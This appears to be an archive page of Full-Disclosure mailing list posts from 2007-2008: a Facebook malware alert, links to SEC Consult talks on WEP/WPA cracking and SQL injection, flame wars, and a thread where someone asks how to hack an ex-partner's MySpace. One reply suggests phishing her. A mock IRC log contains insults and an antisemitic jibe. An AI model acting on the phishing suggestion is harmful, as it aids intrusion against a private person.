You can create a free Hushmail account by clicking on the following link: https://www.hushmail.com/




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] No subject

2008-08-07 Thread James Matthews
It;s the new facebook friend adder

On Wed, Aug 6, 2008 at 3:11 PM, <[EMAIL PROTECTED]> wrote:

> Not just Rouge apps, it's much more widespread: other colors such
> as magenta, mauve, fuschia, and even the extremes of pink and
> purple can also be impacted.
>
> On Wed, Aug 6, 2008 at 2:56 PM, John C. A. Bambenek, GCIH, CISSP
> <[EMAIL PROTECTED]> wrote:
>
>What's the infection vector?  URL Link?  Rouge Facebook app?
>
>On Wed, Aug 6, 2008 at 4:44 PM, Gadi Evron <[EMAIL PROTECTED]>
> wrote:
>
>Hi all.
>
>There's a facebook (possibly worm) something malicious
> sending fake
>messages from real users (friends).
>
>The sample also has a remote drop site (verified by someone
> who shall
>remain nameless).
>
>This is possibly zlob, not verified. Thanks Nick
> Bilogorskiy for his help.
>
>Infection sites seen so far are on .pl domains.
>
>The AV industry will soon add detection.
>Facebook's security folks are very capable, so I am not
> worried on that
>front.
>
>It's not that we didn't expect this for a long time now,
> but...
>Be careful. Some users know to be careful in email.. but
> not on facebook.
>
>Note: unlike 2003 when we called everything a worm and the
> 90s when
>everything was a virus--this is a bot which also
> spreads/infects on facebook.
>
>   Gadi.
>
>
>--
>"You don't need your firewalls! Gadi is Israel's firewall."
>-- Itzik (Isaac) Cohen, "Computers czar", Senior Deputy
> to the Accountant General,
>   Israel's Ministry of Finance, at the government's
> CIO conference, 2005.
>
>(after two very funny self-deprication quotes, time to
> even things up!)
>
>My profile and resume:
>http://www.linkedin.com/in/gadievron
>___
>Fun and Misc security discussion for OT posts.
>https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
>Note: funsec is a public and open mailing list.
>
>
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
>
> --
> Click here for great computer networking solutions!
>
> http://tagline.hushmail.com/fc/Ioyw6h4fM6mUaUAfTcWMkR2Fx209IMXh1QMeRcp6eoXffMEOga9j6I/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
http://www.goldwatches.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] No subject

2008-08-07 Thread az-guy
Not just Rouge apps, it's much more widespread: other colors such 
as magenta, mauve, fuschia, and even the extremes of pink and 
purple can also be impacted.

On Wed, Aug 6, 2008 at 2:56 PM, John C. A. Bambenek, GCIH, CISSP 
<[EMAIL PROTECTED]> wrote:

What's the infection vector?  URL Link?  Rouge Facebook app?

On Wed, Aug 6, 2008 at 4:44 PM, Gadi Evron <[EMAIL PROTECTED]> 
wrote:

Hi all.

There's a facebook (possibly worm) something malicious 
sending fake
messages from real users (friends).

The sample also has a remote drop site (verified by someone 
who shall
remain nameless).

This is possibly zlob, not verified. Thanks Nick 
Bilogorskiy for his help.

Infection sites seen so far are on .pl domains.

The AV industry will soon add detection.
Facebook's security folks are very capable, so I am not 
worried on that
front.

It's not that we didn't expect this for a long time now, 
but...
Be careful. Some users know to be careful in email.. but 
not on facebook.

Note: unlike 2003 when we called everything a worm and the 
90s when
everything was a virus--this is a bot which also 
spreads/infects on facebook.

   Gadi.


--
"You don't need your firewalls! Gadi is Israel's firewall."
-- Itzik (Isaac) Cohen, "Computers czar", Senior Deputy 
to the Accountant General,
   Israel's Ministry of Finance, at the government's 
CIO conference, 2005.

(after two very funny self-deprication quotes, time to 
even things up!)

My profile and resume:
http://www.linkedin.com/in/gadievron
___
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

--
Click here for great computer networking solutions!
http://tagline.hushmail.com/fc/Ioyw6h4fM6mUaUAfTcWMkR2Fx209IMXh1QMeRcp6eoXffMEOga9j6I/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] (no subject)

2008-08-05 Thread Bernhard Mueller
On Wed, 2008-08-06 at 02:26 +0200, Ureleet wrote:
> does that research involve you using a subject line in ur emails?

No, I left it out intentionally to provoke one of your useless posts.

"When n3td3v does a pushup, he isn't lifting himself up, he's pushing
the Earth down!"

-- 
_

Bernhard Mueller
Security Consultant

SEC Consult Unternehmensberatung GmbH
www.sec-consult.com

A-1190 Vienna, Mooslackengasse 17
phone +43 1 8903043 34
fax   +43 1 8903043 15
mobile+43 676 840301 718
email [EMAIL PROTECTED]

Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223
Firmensitz: Prof. Dr. Stephan Korenstraße 10, A-2700 Wiener Neustadt

Advisor for your information security.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2008-08-05 Thread Ureleet
does that research involve you using a subject line in ur emails?

On Tue, Aug 5, 2008 at 6:22 PM, Bernhard Mueller
<[EMAIL PROTECTED]> wrote:
> Hello,
>
> We recently decided to release some of our research to the public, so
> selected presentations from our internal tech meetings will from now on
> be available for download at SEC Consult website. The presentations
> (some of which are in german) will include everything from general
> howtos to highly specialized pentesting-stuff.
> We will also release a whitepaper on a variant of the new DNS poisoning
> attack tomorrow. We wrote this whitepaper along with an exploit a while
> ago, and somehow managed NOT to leak it to the press before the Kaminsky
> talk :)
> The presentations and whitepapers, along with our past presentations
> from Blackhat and Deepsec, can be found at:
>
>
> http://www.sec-consult.com/publikationen_e.html
>
>
> Here are some links to what is already online:
>
>
> * A german guide to WEP/WPA cracking, by Johannes Greil:
>
>
> http://www.sec-consult.com/files/Wireless_LAN_attacks_wo_fancy_style.pdf
>
> * A presentation on the method of using DLL injection to interface to an
> SSL connection used by a running process (I used this for
> blackbox-testing certain binary SSL client/server applications):
>
>  http://www.sec-consult.com/files/SSL_Packet_Injection_BMU.pdf
>
> * A short presentation on a method of error-based SQL injection in
> Sybase databases, by Thomas Kerbl:
>
>  http://www.sec-consult.com/files/Sybase_ModSecurity_Evasion_TKE.pdf
>
>
> I hope that some of you will find this useful.
>
>
> Regards,
>
> Bernhard (Certified Internet Security Superstar)
>
> --
> _
>
> Bernhard Mueller
> Security Consultant
>
> SEC Consult Unternehmensberatung GmbH
> www.sec-consult.com
>
> A-1190 Vienna, Mooslackengasse 17
> phone +43 1 8903043 34
> fax   +43 1 8903043 15
> mobile+43 676 840301 718
> email [EMAIL PROTECTED]
>
> Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223
> Firmensitz: Prof. Dr. Stephan Korenstraße 10, A-2700 Wiener Neustadt
>
> Advisor for your information security.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] (no subject)

2008-08-05 Thread Bernhard Mueller
Hello,

We recently decided to release some of our research to the public, so
selected presentations from our internal tech meetings will from now on
be available for download at SEC Consult website. The presentations
(some of which are in german) will include everything from general
howtos to highly specialized pentesting-stuff.
We will also release a whitepaper on a variant of the new DNS poisoning
attack tomorrow. We wrote this whitepaper along with an exploit a while
ago, and somehow managed NOT to leak it to the press before the Kaminsky
talk :)
The presentations and whitepapers, along with our past presentations
from Blackhat and Deepsec, can be found at:


http://www.sec-consult.com/publikationen_e.html


Here are some links to what is already online:


* A german guide to WEP/WPA cracking, by Johannes Greil:


http://www.sec-consult.com/files/Wireless_LAN_attacks_wo_fancy_style.pdf

* A presentation on the method of using DLL injection to interface to an
SSL connection used by a running process (I used this for
blackbox-testing certain binary SSL client/server applications):

  http://www.sec-consult.com/files/SSL_Packet_Injection_BMU.pdf

* A short presentation on a method of error-based SQL injection in
Sybase databases, by Thomas Kerbl:

  http://www.sec-consult.com/files/Sybase_ModSecurity_Evasion_TKE.pdf


I hope that some of you will find this useful.


Regards,

Bernhard (Certified Internet Security Superstar)

-- 
_

Bernhard Mueller
Security Consultant

SEC Consult Unternehmensberatung GmbH
www.sec-consult.com

A-1190 Vienna, Mooslackengasse 17
phone +43 1 8903043 34
fax   +43 1 8903043 15
mobile+43 676 840301 718
email [EMAIL PROTECTED]

Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223
Firmensitz: Prof. Dr. Stephan Korenstraße 10, A-2700 Wiener Neustadt

Advisor for your information security.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] (no subject)

2008-05-04 Thread root
Ok that's enough.
You are going to /dev/null n3td3v, enjoy.

n3td3v wrote:
> I gave out my name out to a public chat room and the URL of my web
> page of the school I used to go to months ago when I was attending
> that school.
> 
> The person has posted this on Full-Disclosure mailing list, this
> information was in the public domain anyway, and I was aware at some
> point in the future it would eventually make it on to Full-Disclosure
> mailing list.
> 
> My on line contacts were aware of my name previously, I have not been
> hiding who i've been to the people who wanted to know, that's why the
> person who posted the information knew who I was, this is because it
> has always been public information.
> 
> I'm an honest person and have never hidden, that's why the information
> is public and has made it onto Full-Disclosure mailing list.
> 
> I wasn't hacked or was I socially engineered, I gave out the
> information to public chat rooms and IRC on many occasions.
> 
> I just want to clear this matter so we can proceed.
> 
> Yes my name is that name, but I will be continuing to post as n3td3v
> and my style of posting will not change.
> 
> If anything it has energised me to keep going even more, I will not
> give in because someone has posted already public information onto the
> Full-Disclosure mailing list.
> 
> I don't mind my name being given out, even though its not a perfect situation.
> 
> If you want to meet up with me in real life, or get any other
> information about me, just ask, there is no reason for doing some kind
> of malicious post of information, which I was freely handing out on
> the back communication channels anyway.
> 
> I put both my hands up and say, yes I am that person and the
> intelligence the person has posted is accurate, but it changes nothing
> in my view of things.
> 
> Everything i've said on Full-Disclosure mailing list I stand by and
> will be willing to take any questions that people have.
> 
> n3td3v is my on line nick name and is staying as such, you may know my
> real name now, but n3td3v and the n3td3v group continue...
> 
> Everything i've said is still the truth to my on line nick name and my
> real name, all the truth that is on the internet is all still the
> truth.
> 
> I may troll about some things, but my history with the underground
> doesn't change, I am who I am and I can't change that.
> 
> I could of ignored the person who post the information, and I did for
> a few days, but i've decided to take the honest approach and say yes
> that's me, now who cares anyway?
> 
> All the best,
> 
> n3td3v
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] (no subject)

2008-04-01 Thread Garrett M. Groff
Another approach is that you could stop reading her blog and seek an 
alternate past-time(s). That would avoid the commission of computer crime 
and its possible ramifications.

- G



- Original Message - 
From: "josh" <[EMAIL PROTECTED]>
To: "Cody Roby" <[EMAIL PROTECTED]>; 
<[EMAIL PROTECTED]>; 

Sent: Tuesday, April 01, 2008 3:50 PM
Subject: Re: [Full-disclosure] (no subject)


Can you sue for slander? And probably a simple phishing techique would work 
against her.
Sent from my BlackBerry® smartphone with SprintSpeed

-Original Message-
From: Cody Roby <[EMAIL PROTECTED]>

Date: Tue, 1 Apr 2008 15:31:38
To:
Subject: [Full-disclosure] (no subject)


Alright i have a crazy ex who keeps posting malicous things about me on her 
myspace and i would like to know how to use html errors to hack her myspace, 
i saw a previous post, but the code has been removed. please help.


Pack up or back up–use SkyDrive to transfer files or keep extra copies. 
Learn how. ___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] (no subject)

2008-04-01 Thread josh
Can you sue for slander? And probably a simple phishing techique would work 
against her.
Sent from my BlackBerry® smartphone with SprintSpeed

-Original Message-
From: Cody Roby <[EMAIL PROTECTED]>

Date: Tue, 1 Apr 2008 15:31:38 
To:
Subject: [Full-disclosure] (no subject)


Alright i have a crazy ex who keeps posting malicous things about me on her 
myspace and i would like to know how to use html errors to hack her myspace, i 
saw a previous post, but the code has been removed. please help.


Pack up or back up–use SkyDrive to transfer files or keep extra copies. Learn 
how. ___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] (no subject)

2008-04-01 Thread Cody Roby

Alright i have a crazy ex who keeps posting malicous things about me on her 
myspace and i would like to know how to use html errors to hack her myspace, i 
saw a previous post, but the code has been removed. please help.
_
Pack up or back up–use SkyDrive to transfer files or keep extra copies. Learn 
how.
hthttp://www.windowslive.com/skydrive/overview.html?ocid=TXT_TAGLM_WL_Refresh_skydrive_packup_042008___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] (no subject)

2008-03-21 Thread Mister Swole
Exposed ... the truth behind worried and his script kiddiocy


[15:49] * Now talking in ##kiddiots
[15:55]  someone actually asked for me? you mean I made a friend
[15:55]  yes worried, I believe your expertise
[15:56]  h4x0r, I am the leetest on the planet
[15:57]  worried, I knew this the moment you /j #kiddiots
[15:57]  you rawk!
[15:58]  where there is a will there is a way
[15:58]  i have so much to offer the security industry
[15:58]  heh, I said that the minute you stated you wouldn't 
work for a living
[15:58]  kinder: that's right although I love security I would never 
make a living from it
[15:59]  I plan on staying in my mom's basement forever and pzwning 
the world
[15:59]  oh yeah?
[16:00]  yup and I will make it a point to never be useful on full 
disclosure
[16:01]  I'm with you in turning full disclosure into fool 
disclosure
[16:01]  thats good
[16:02]  any idea how I can sound a bit 31337'er?
[16:02]  XSS
[16:03]  I invented XSS its old news
[16:03]  in fact little do people know but I created the template for 
RFC's 1-5000
[16:04]  it was fun
[16:04]  wow
[16:04]  how can I grow down to be like you?
[16:04]  what other mailing lists can I troll on like you
[16:04]  I will never disclose this secret
[16:04]  besides my mom doesn't like people knocking on the door
[16:04]  what do you do when you need to get laid?
[16:08]  your intelligence is lacking. I suggest you google RFC12692
[16:09]  you're the bestest mostest security ninjaest in the 
world
[16:09]  damn right I am
[16:11]  now that you've admitted this, I will post it to FD as proof 
of being the bestest
[16:12]  just omit the part when you did that little thing to me 
in your basement?
[16:13]  I told you never to talk about that on a public channel
[16:15]  tee hee joo gn0h i l0ve jew



-- 
Want an e-mail address like mine?
Get a free e-mail account today at www.mail.com!

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] (no subject)

2008-03-20 Thread andrius . vysnia
test

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] (no subject)

2007-12-23 Thread Eyüp Aydin





  Jetzt Mails schnell in einem Vorschaufenster überfliegen. Dies und viel 
mehr bietet das neue Yahoo! Mail - www.yahoo.de/mail___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2007-12-09 Thread dripping
reepex:
thanks for the good reads.
i think i'd buy you a cake for the lol'ness contained in them.
later days!

simon:
just because you can't think of anything rude to say doesn't mean you
have to leave :(

reepex wrote:
> lol i sent all the emails
> 
> ill probably get banned like usual but ill have a new account in a couple
> days
> 
> On Dec 9, 2007 2:12 PM, dripping <[EMAIL PROTECTED]> wrote:
> 
>> pedophilia is pretty serious.
>>
>> Simon Smith wrote:
>>> and yes.. I'll stop playing with the children now.
>>>
>>> Simon Smith wrote:
 Forward what ever you want, just make sure to edit it first so that you
 don't look like a liar ;)

 dripping wrote:
> I like how he still hasn't responded.
>
> reepex wrote:
>> im going to wait for simon to respond ;P
>>
>> he is really good at making himself look like an idiot
>>
>> On Dec 9, 2007 1:39 PM, dripping <[EMAIL PROTECTED]> wrote:
>>
>>> not that i care if this is on/off the list,
>>> do it * 9000.
>>>
>>> reepex wrote:
 turned down? should i forward the list the emails were you and that
>>> random
 from netragard were begging me to work for you?

 On Dec 9, 2007 12:17 PM, Simon Smith <[EMAIL PROTECTED]> wrote:

> Awww, reepex feels bad because he got turned down... ;]
>
> reepex wrote:
>> only simon from snosoft and people from netragard try to hire
>> people
>> from FD ;)
>>
>> apparently they are not too satisfied with their current
>> employees'
> skills
>> On Dec 9, 2007 12:04 AM, dripping < [EMAIL PROTECTED]
>> > wrote:
>>
>> And would you like to join my new CYBERSECURITY FIRM?
>> We post to mailing lists and advertise like we're not
>> actually
>> advertising for ourselves.
>>
>> reepex wrote:
>> > I tried responding to your mail but it seems you did not
>> get it
>>> so
>> maybe you
>> > will on the list
>> >
>> > yes I would LOVE to your join your crew - could you please
>> email
>> me your
>> > silc server and bbs board details?
>> >
>> > On Dec 3, 2007 8:00 AM, Gobbles is back <
>> [EMAIL PROTECTED] > [EMAIL PROTECTED]
>> > wrote:
>> >
>> >> Would you wish to join our crew ?
>> >>
>> >>
>> >>
>> >
>> >
>> >
>>
>> 
>> >
>> > ___
>> > Full-Disclosure - We believe in it.
>> > Charter:
>> http://lists.grok.org.uk/full-disclosure-charter.html
>> 
>> > Hosted and sponsored by Secunia - http://secunia.com/
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter:
>> http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>>
>>
>> 
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
> --
>
> - simon
>
> --
> http://www.snosoft.com
>
>
>> 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] (no subject)

2007-12-09 Thread reepex
the emails are sent

your move

On Dec 9, 2007 2:02 PM, Simon Smith <[EMAIL PROTECTED]> wrote:

> Forward what ever you want, just make sure to edit it first so that you
> don't look like a liar ;)
>
> dripping wrote:
> > I like how he still hasn't responded.
> >
> > reepex wrote:
> >> im going to wait for simon to respond ;P
> >>
> >> he is really good at making himself look like an idiot
> >>
> >> On Dec 9, 2007 1:39 PM, dripping <[EMAIL PROTECTED]> wrote:
> >>
> >>> not that i care if this is on/off the list,
> >>> do it * 9000.
> >>>
> >>> reepex wrote:
>  turned down? should i forward the list the emails were you and that
> >>> random
>  from netragard were begging me to work for you?
> 
>  On Dec 9, 2007 12:17 PM, Simon Smith <[EMAIL PROTECTED]> wrote:
> 
> > Awww, reepex feels bad because he got turned down... ;]
> >
> > reepex wrote:
> >> only simon from snosoft and people from netragard try to hire
> people
> >> from FD ;)
> >>
> >> apparently they are not too satisfied with their current employees'
> > skills
> >> On Dec 9, 2007 12:04 AM, dripping < [EMAIL PROTECTED]
> >> > wrote:
> >>
> >> And would you like to join my new CYBERSECURITY FIRM?
> >> We post to mailing lists and advertise like we're not actually
> >> advertising for ourselves.
> >>
> >> reepex wrote:
> >> > I tried responding to your mail but it seems you did not get
> it
> >>> so
> >> maybe you
> >> > will on the list
> >> >
> >> > yes I would LOVE to your join your crew - could you please
> email
> >> me your
> >> > silc server and bbs board details?
> >> >
> >> > On Dec 3, 2007 8:00 AM, Gobbles is back <
> >> [EMAIL PROTECTED]  [EMAIL PROTECTED]
> >> > wrote:
> >> >
> >> >> Would you wish to join our crew ?
> >> >>
> >> >>
> >> >>
> >> >
> >> >
> >> >
> >>
> >>>
> 
> >> >
> >> > ___
> >> > Full-Disclosure - We believe in it.
> >> > Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> >> 
> >> > Hosted and sponsored by Secunia - http://secunia.com/
> >>
> >> ___
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> >>
> >>
> >>
> >>
> >>>
> 
> >> ___
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> > --
> >
> > - simon
> >
> > --
> > http://www.snosoft.com
> >
> >
> 
> 
> 
>  ___
>  Full-Disclosure - We believe in it.
>  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>  Hosted and sponsored by Secunia - http://secunia.com/
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
>
> --
>
> - simon
>
> --
> http://www.snosoft.com
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2007-12-09 Thread Simon Smith
Hah, ok that was funny, but I'm really going to shut up now cause this
thread is pointless. ;.

ripping wrote:
> pedophilia is pretty serious.
> 
> Simon Smith wrote:
>> and yes.. I'll stop playing with the children now.
>>
>> Simon Smith wrote:
>>> Forward what ever you want, just make sure to edit it first so that you
>>> don't look like a liar ;)
>>>
>>> dripping wrote:
 I like how he still hasn't responded.

 reepex wrote:
> im going to wait for simon to respond ;P
>
> he is really good at making himself look like an idiot
>
> On Dec 9, 2007 1:39 PM, dripping <[EMAIL PROTECTED]> wrote:
>
>> not that i care if this is on/off the list,
>> do it * 9000.
>>
>> reepex wrote:
>>> turned down? should i forward the list the emails were you and that
>> random
>>> from netragard were begging me to work for you?
>>>
>>> On Dec 9, 2007 12:17 PM, Simon Smith <[EMAIL PROTECTED]> wrote:
>>>
 Awww, reepex feels bad because he got turned down... ;]

 reepex wrote:
> only simon from snosoft and people from netragard try to hire people
> from FD ;)
>
> apparently they are not too satisfied with their current employees'
 skills
> On Dec 9, 2007 12:04 AM, dripping < [EMAIL PROTECTED]
> > wrote:
>
> And would you like to join my new CYBERSECURITY FIRM?
> We post to mailing lists and advertise like we're not actually
> advertising for ourselves.
>
> reepex wrote:
> > I tried responding to your mail but it seems you did not get it
>> so
> maybe you
> > will on the list
> >
> > yes I would LOVE to your join your crew - could you please email
> me your
> > silc server and bbs board details?
> >
> > On Dec 3, 2007 8:00 AM, Gobbles is back <
> [EMAIL PROTECTED]  > wrote:
> >
> >> Would you wish to join our crew ?
> >>
> >>
> >>
> >
> >
> >
>
>> 
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> 
> > Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
>
>> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
 --

 - simon

 --
 http://www.snosoft.com


>>> 
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
>>
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/


-- 

- simon

--
http://www.snosoft.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] (no subject)

2007-12-09 Thread dripping
pedophilia is pretty serious.

Simon Smith wrote:
> and yes.. I'll stop playing with the children now.
> 
> Simon Smith wrote:
>> Forward what ever you want, just make sure to edit it first so that you
>> don't look like a liar ;)
>>
>> dripping wrote:
>>> I like how he still hasn't responded.
>>>
>>> reepex wrote:
 im going to wait for simon to respond ;P

 he is really good at making himself look like an idiot

 On Dec 9, 2007 1:39 PM, dripping <[EMAIL PROTECTED]> wrote:

> not that i care if this is on/off the list,
> do it * 9000.
>
> reepex wrote:
>> turned down? should i forward the list the emails were you and that
> random
>> from netragard were begging me to work for you?
>>
>> On Dec 9, 2007 12:17 PM, Simon Smith <[EMAIL PROTECTED]> wrote:
>>
>>> Awww, reepex feels bad because he got turned down... ;]
>>>
>>> reepex wrote:
 only simon from snosoft and people from netragard try to hire people
 from FD ;)

 apparently they are not too satisfied with their current employees'
>>> skills
 On Dec 9, 2007 12:04 AM, dripping < [EMAIL PROTECTED]
 > wrote:

 And would you like to join my new CYBERSECURITY FIRM?
 We post to mailing lists and advertise like we're not actually
 advertising for ourselves.

 reepex wrote:
 > I tried responding to your mail but it seems you did not get it
> so
 maybe you
 > will on the list
 >
 > yes I would LOVE to your join your crew - could you please email
 me your
 > silc server and bbs board details?
 >
 > On Dec 3, 2007 8:00 AM, Gobbles is back <
 [EMAIL PROTECTED]  wrote:
 >
 >> Would you wish to join our crew ?
 >>
 >>
 >>
 >
 >
 >

> 
 >
 > ___
 > Full-Disclosure - We believe in it.
 > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 
 > Hosted and sponsored by Secunia - http://secunia.com/

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




> 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
>>> --
>>>
>>> - simon
>>>
>>> --
>>> http://www.snosoft.com
>>>
>>>
>> 
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>
> 
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] (no subject)

2007-12-09 Thread Simon Smith
and yes.. I'll stop playing with the children now.

Simon Smith wrote:
> Forward what ever you want, just make sure to edit it first so that you
> don't look like a liar ;)
> 
> dripping wrote:
>> I like how he still hasn't responded.
>>
>> reepex wrote:
>>> im going to wait for simon to respond ;P
>>>
>>> he is really good at making himself look like an idiot
>>>
>>> On Dec 9, 2007 1:39 PM, dripping <[EMAIL PROTECTED]> wrote:
>>>
 not that i care if this is on/off the list,
 do it * 9000.

 reepex wrote:
> turned down? should i forward the list the emails were you and that
 random
> from netragard were begging me to work for you?
>
> On Dec 9, 2007 12:17 PM, Simon Smith <[EMAIL PROTECTED]> wrote:
>
>> Awww, reepex feels bad because he got turned down... ;]
>>
>> reepex wrote:
>>> only simon from snosoft and people from netragard try to hire people
>>> from FD ;)
>>>
>>> apparently they are not too satisfied with their current employees'
>> skills
>>> On Dec 9, 2007 12:04 AM, dripping < [EMAIL PROTECTED]
>>> > wrote:
>>>
>>> And would you like to join my new CYBERSECURITY FIRM?
>>> We post to mailing lists and advertise like we're not actually
>>> advertising for ourselves.
>>>
>>> reepex wrote:
>>> > I tried responding to your mail but it seems you did not get it
 so
>>> maybe you
>>> > will on the list
>>> >
>>> > yes I would LOVE to your join your crew - could you please email
>>> me your
>>> > silc server and bbs board details?
>>> >
>>> > On Dec 3, 2007 8:00 AM, Gobbles is back <
>>> [EMAIL PROTECTED] >> > wrote:
>>> >
>>> >> Would you wish to join our crew ?
>>> >>
>>> >>
>>> >>
>>> >
>>> >
>>> >
>>>
 
>>> >
>>> > ___
>>> > Full-Disclosure - We believe in it.
>>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> 
>>> > Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
